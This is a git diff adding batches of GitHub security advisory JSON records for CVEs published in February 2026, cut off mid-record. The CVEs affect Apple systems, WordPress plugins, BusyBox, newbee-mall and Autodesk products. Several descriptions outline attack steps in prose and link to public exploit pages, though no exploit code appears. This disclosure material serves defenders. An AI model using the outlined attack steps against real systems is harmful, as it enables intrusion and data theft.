a/advisories/unreviewed/2026/02/GHSA-r7jp-3wp4-fvf4/GHSA-r7jp-3wp4-fvf4.json b/advisories/unreviewed/2026/02/GHSA-r7jp-3wp4-fvf4/GHSA-r7jp-3wp4-fvf4.json new file mode 100644 index 0000000000000..6d981a8685767 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r7jp-3wp4-fvf4/GHSA-r7jp-3wp4-fvf4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r7jp-3wp4-fvf4", + "modified": "2026-02-17T15:31:34Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20629" + ], + "details": "A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Tahoe 26.3. An app may be able to access user-sensitive data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20629" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-922" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json b/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json new file mode 100644 index 0000000000000..8845ecb3b866e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r7pc-wm4g-53rv", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-27056" + ], + "details": "Missing Authorization vulnerability in StellarWP iThemes Sync ithemes-sync allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects iThemes Sync: from n/a through <= 3.2.8.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27056" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/ithemes-sync/vulnerability/wordpress-ithemes-sync-plugin-3-2-8-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r7qg-5929-634m/GHSA-r7qg-5929-634m.json b/advisories/unreviewed/2026/02/GHSA-r7qg-5929-634m/GHSA-r7qg-5929-634m.json new file mode 100644 index 0000000000000..50e3629e982f1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r7qg-5929-634m/GHSA-r7qg-5929-634m.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r7qg-5929-634m", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37185" + ], + "details": "Backup Key Recovery 2.2.5 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the 'Name' input field. Attackers can generate a 1000-character payload and paste it into the registration name field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37185" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47909" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/backup-key-recovery-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8f8-4pgh-4m8v/GHSA-r8f8-4pgh-4m8v.json b/advisories/unreviewed/2026/02/GHSA-r8f8-4pgh-4m8v/GHSA-r8f8-4pgh-4m8v.json new file mode 100644 index 0000000000000..16782ff5d4e65 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r8f8-4pgh-4m8v/GHSA-r8f8-4pgh-4m8v.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8f8-4pgh-4m8v", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2026-26158" + ], + "details": "A flaw was found in BusyBox. This vulnerability allows an attacker to modify files outside of the intended extraction directory by crafting a malicious tar archive containing unvalidated hardlink or symlink entries. If the tar archive is extracted with elevated privileges, this flaw can lead to privilege escalation, enabling an attacker to gain unauthorized access to critical system files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26158" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-26158" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439040" + }, + { + "type": "WEB", + "url": "https://git.busybox.net/busybox/commit/archival?id=3fb6b31c716669e12f75a2accd31bb7685b1a1cb" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-73" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8hc-3q2v-m9fj/GHSA-r8hc-3q2v-m9fj.json b/advisories/unreviewed/2026/02/GHSA-r8hc-3q2v-m9fj/GHSA-r8hc-3q2v-m9fj.json new file mode 100644 index 0000000000000..c2a11e57e1455 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r8hc-3q2v-m9fj/GHSA-r8hc-3q2v-m9fj.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8hc-3q2v-m9fj", + "modified": "2026-02-14T09:31:33Z", + "published": "2026-02-14T09:31:33Z", + "aliases": [ + "CVE-2026-0735" + ], + "details": "The User Language Switch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tab_color_picker_language_switch' parameter in all versions up to, and including, 1.6.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0735" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/user-language-switch/tags/1.6.10/uls-options.php#L365" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/user-language-switch/trunk/uls-options.php#L365" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c6f61e13-20fb-4cef-bae7-2cd5fa038175?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T07:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8m3-w58q-qp9h/GHSA-r8m3-w58q-qp9h.json b/advisories/unreviewed/2026/02/GHSA-r8m3-w58q-qp9h/GHSA-r8m3-w58q-qp9h.json new file mode 100644 index 0000000000000..7cc03b834cc2e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r8m3-w58q-qp9h/GHSA-r8m3-w58q-qp9h.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8m3-w58q-qp9h", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2026-26219" + ], + "details": "newbee-mall stores and verifies user passwords using an unsalted MD5 hashing algorithm. The implementation does not incorporate per-user salts or computational cost controls, enabling attackers who obtain password hashes through database exposure, backup leakage, or other compromise vectors to rapidly recover plaintext credentials via offline attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26219" + }, + { + "type": "WEB", + "url": "https://github.com/newbee-ltd/newbee-mall/issues/119" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/newbee-mall-unsalted-md5-password-hashing-enables-offline-credential-cracking" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T19:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8mq-23vx-xrgv/GHSA-r8mq-23vx-xrgv.json b/advisories/unreviewed/2026/02/GHSA-r8mq-23vx-xrgv/GHSA-r8mq-23vx-xrgv.json index f37f12fd35a58..0802c5dd26945 100644 --- a/advisories/unreviewed/2026/02/GHSA-r8mq-23vx-xrgv/GHSA-r8mq-23vx-xrgv.json +++ b/advisories/unreviewed/2026/02/GHSA-r8mq-23vx-xrgv/GHSA-r8mq-23vx-xrgv.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json b/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json new file mode 100644 index 0000000000000..42de4ac210f90 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r942-7mj9-p58w", + "modified": "2026-02-12T18:30:23Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20663" + ], + "details": "The issue was resolved by sanitizing logging. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An app may be able to enumerate a user's installed apps.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20663" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r996-q9x2-5wwf/GHSA-r996-q9x2-5wwf.json b/advisories/unreviewed/2026/02/GHSA-r996-q9x2-5wwf/GHSA-r996-q9x2-5wwf.json new file mode 100644 index 0000000000000..47d2f7dccda06 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r996-q9x2-5wwf/GHSA-r996-q9x2-5wwf.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r996-q9x2-5wwf", + "modified": "2026-02-15T15:31:31Z", + "published": "2026-02-15T15:31:31Z", + "aliases": [ + "CVE-2026-2516" + ], + "details": "A vulnerability was identified in Unidocs ezPDF DRM Reader and ezPDF Reader 2.0/3.0.0.4 on 32-bit. This affects an unknown part in the library SHFOLDER.dll. Such manipulation leads to uncontrolled search path. The attack needs to be performed locally. Attacks of this nature are highly complex. It is indicated that the exploitability is difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2516" + }, + { + "type": "WEB", + "url": "https://gofile.me/7bU54/ZG47Lh7Yx" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346107" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346107" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.736172" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-426" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-15T13:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rccq-h9rv-fmqp/GHSA-rccq-h9rv-fmqp.json b/advisories/unreviewed/2026/02/GHSA-rccq-h9rv-fmqp/GHSA-rccq-h9rv-fmqp.json new file mode 100644 index 0000000000000..efe8d2b697520 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rccq-h9rv-fmqp/GHSA-rccq-h9rv-fmqp.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rccq-h9rv-fmqp", + "modified": "2026-02-11T21:30:38Z", + "published": "2026-02-11T15:30:24Z", + "aliases": [ + "CVE-2025-30276" + ], + "details": "An out-of-bounds write vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify or corrupt memory.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30276" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json b/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json new file mode 100644 index 0000000000000..853829fb4e468 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rcjr-qg8v-4c3v", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-0875" + ], + "details": "A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0875" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/products/autodesk-access/overview" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rf63-9f5h-hhg6/GHSA-rf63-9f5h-hhg6.json b/advisories/unreviewed/2026/02/GHSA-rf63-9f5h-hhg6/GHSA-rf63-9f5h-hhg6.json new file mode 100644 index 0000000000000..5df4b3ed9af09 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rf63-9f5h-hhg6/GHSA-rf63-9f5h-hhg6.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rf63-9f5h-hhg6", + "modified": "2026-02-14T18:30:16Z", + "published": "2026-02-14T18:30:16Z", + "aliases": [ + "CVE-2026-23204" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: cls_u32: use skb_header_pointer_careful()\n\nskb_header_pointer() does not fully validate negative @offset values.\n\nUse skb_header_pointer_careful() instead.\n\nGangMin Kim provided a report and a repro fooling u32_classify():\n\nBUG: KASAN: slab-out-of-bounds in u32_classify+0x1180/0x11b0\nnet/sched/cls_u32.c:221", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23204" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/13336a6239b9d7c6e61483017bb8bdfe3ceb10a5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8a672f177ebe19c93d795fbe967846084fbc7943" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/cabd1a976375780dabab888784e356f574bbaed8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e41a23e61259f5526af875c3b86b3d42a9bae0e5" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rf92-7gjw-vm2g/GHSA-rf92-7gjw-vm2g.json b/advisories/unreviewed/2026/02/GHSA-rf92-7gjw-vm2g/GHSA-rf92-7gjw-vm2g.json new file mode 100644 index 0000000000000..c10149e9b8b8c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rf92-7gjw-vm2g/GHSA-rf92-7gjw-vm2g.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rf92-7gjw-vm2g", + "modified": "2026-02-19T15:30:35Z", + "published": "2026-02-19T15:30:35Z", + "aliases": [ + "CVE-2019-25429" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted input to the openvpn_advanced endpoint. Attackers can inject JavaScript code through the GLOBAL_NETWORKS and GLOBAL_DNS parameters via POST requests to execute arbitrary scripts in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25429" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-reflected-cross-site-scripting-via-openvpnadvanced" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json b/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json new file mode 100644 index 0000000000000..9fb7b080ef19d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rf9x-x7wj-42rg", + "modified": "2026-02-19T18:31:52Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25362" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FooPlugins FooGallery foogallery allows Stored XSS.This issue affects FooGallery: from n/a through <= 3.1.11.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25362" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/foogallery/vulnerability/wordpress-foogallery-plugin-3-1-11-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rfj2-v87v-5mg6/GHSA-rfj2-v87v-5mg6.json b/advisories/unreviewed/2026/02/GHSA-rfj2-v87v-5mg6/GHSA-rfj2-v87v-5mg6.json new file mode 100644 index 0000000000000..0689aaeccd3cd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rfj2-v87v-5mg6/GHSA-rfj2-v87v-5mg6.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfj2-v87v-5mg6", + "modified": "2026-02-17T18:32:58Z", + "published": "2026-02-17T18:32:58Z", + "aliases": [ + "CVE-2026-2618" + ], + "details": "A vulnerability was determined in Beetel 777VR1 up to 01.00.09. This impacts an unknown function of the component SSH Service. This manipulation causes risky cryptographic algorithm. The attack is possible to be carried out remotely. The attack is considered to have high complexity. The exploitability is said to be difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2618" + }, + { + "type": "WEB", + "url": "https://gist.github.com/raghav20232023/8e8e559f80e2d596cb6154747f69a081" + }, + { + "type": "WEB", + "url": "https://gist.github.com/raghav20232023/8e8e559f80e2d596cb6154747f69a081#proof--steps-to-reproduce" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346268" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346268" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.751633" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T17:21:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rfjq-chwp-46m7/GHSA-rfjq-chwp-46m7.json b/advisories/unreviewed/2026/02/GHSA-rfjq-chwp-46m7/GHSA-rfjq-chwp-46m7.json index d9605c163a3ba..1105520a4f7a7 100644 --- a/advisories/unreviewed/2026/02/GHSA-rfjq-chwp-46m7/GHSA-rfjq-chwp-46m7.json +++ b/advisories/unreviewed/2026/02/GHSA-rfjq-chwp-46m7/GHSA-rfjq-chwp-46m7.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rfjq-chwp-46m7", - "modified": "2026-02-05T12:30:26Z", + "modified": "2026-02-19T21:30:42Z", "published": "2026-02-05T12:30:26Z", "aliases": [ "CVE-2026-23796" ], "details": "Quick.Cart allows a user's session identifier to be set before authentication. The value of this session ID stays the same after authentication. This behaviour enables an attacker to fix a session ID\nfor a victim and later hijack the authenticated session.\n\nThe vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.7 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-rfmq-rw5v-3vw4/GHSA-rfmq-rw5v-3vw4.json b/advisories/unreviewed/2026/02/GHSA-rfmq-rw5v-3vw4/GHSA-rfmq-rw5v-3vw4.json new file mode 100644 index 0000000000000..5e446c3152acf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rfmq-rw5v-3vw4/GHSA-rfmq-rw5v-3vw4.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfmq-rw5v-3vw4", + "modified": "2026-02-14T06:30:57Z", + "published": "2026-02-14T06:30:57Z", + "aliases": [ + "CVE-2026-26298" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26298" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rfq8-v234-58w4/GHSA-rfq8-v234-58w4.json b/advisories/unreviewed/2026/02/GHSA-rfq8-v234-58w4/GHSA-rfq8-v234-58w4.json new file mode 100644 index 0000000000000..b20a3b82ec1ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rfq8-v234-58w4/GHSA-rfq8-v234-58w4.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfq8-v234-58w4", + "modified": "2026-02-13T00:32:51Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20627" + ], + "details": "An issue existed in the handling of environment variables. This issue was addressed with improved validation. This issue is fixed in watchOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to access sensitive user data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20627" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": 